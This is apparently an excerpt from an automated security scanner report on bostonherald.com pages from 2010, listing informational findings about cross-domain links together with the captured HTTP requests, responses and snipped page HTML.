<a class="Flag" href="#" onclick="flagPost('1818667','/news/columnists/view.bg?articleid=1294590&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
</a>  |  <a class="LinksRedNone" style="text-decoration:underline" href="http://www.heraldmedia.com/privacy.html" target="_new">Privacy commitment</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(144) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
lick to open photo gallery: 2010 Mass. election" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4514','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101106/856fdd_baker_11072010.jpg" alt="DECISION DAY: Gubernatorial candidate..." /></A>
...[SNIP]...
<A HREF="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4514','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101106/stp/25c56a_110210cahilltf07.jpg" alt="Boston Herald"></a>
...[SNIP]...
<div id="buyPhotosBar">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/news\\2010 Mass. election"><img src="/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/news\\2010 Mass. election">Purchase Herald Photos</a>
...[SNIP]...
<a href="/news/us_politics/view/20101107gops_mike_pence_to_decide_on_2012_bid_after_new_year/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/25bec3_pence.jpg" alt="GOP’s Mike Pence to decide on 2012 bid after new year" /></a>
...[SNIP]...
<a href="/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/64a019_obam.jpg" alt="Obama says ‘midcourse corrections’ to come at home" /></a>
...[SNIP]...
<a href="/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/0ecd46_eagan_11072010.jpg" alt="Shaunna O’Connell used state rep’s own words in defeating him" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1294590%26format%3Dcomments&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.21. http://bostonherald.com/news/document.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/document.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnership&k=bh

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fdocument.bg%3Ff%3Dmisc%2F100216housing.pdf%26h%3DMassachusetts%2520Housing%2520Partnership%26k%3Dbh&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnership&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:53:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="News & Opinion - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fdocument.bg%3Ff%3Dmisc%2F100216housing.pdf%26h%3DMassachusetts%2520Housing%2520Partnership%26k%3Dbh&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries </a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.22. http://bostonherald.com/news/international/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/international/?srvc=news&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Finternational%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/international/
http://img.video.ap.org/p/j/apovn.js
http://multimedia.heraldinteractive.com/images/20101106/stp/482dc1_yemen_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/d7378a_indone.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/fbe4fd_spain.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/010a77_volc.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/3704c1_packa.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/487734_myanm.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/5ada8f_greec.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/845d64_pope.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/8e7512_putin.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/cd7965_queen.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/f09bca_button.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/international/?srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:42:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="International - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/international/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Finternational%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.23. http://bostonherald.com/news/international/europe/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/europe/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/international/europe/view.bg?articleid=1294768&srvc=news&position=recent

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Finternational%2Feurope%2Fview%2F20101107police_arrest_man_in_swedish_immigrant_shootings%2Fsrvc%3Dnews%26position%3Drecent_bullet&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/international/europe/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /news/international/europe/view.bg?articleid=1294768&srvc=news&position=recent HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:47:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Finternational%2Feurope%2Fview%2F20101107police_arrest_man_in_swedish_immigrant_shootings%2Fsrvc%3Dnews%26position%3Drecent_bullet&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Police arrest man in Swedish immigrant shootings');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/international/europe/view.bg?articleid=1294768&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(0) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Finternational%2Feurope%2Fview%2F20101107police_arrest_man_in_swedish_immigrant_shootings%2Fsrvc%3Dnews%26position%3Drecent_bullet&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.24. http://bostonherald.com/news/national/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/national/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/national/?srvc=news&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fnational%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/margery_eagan.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
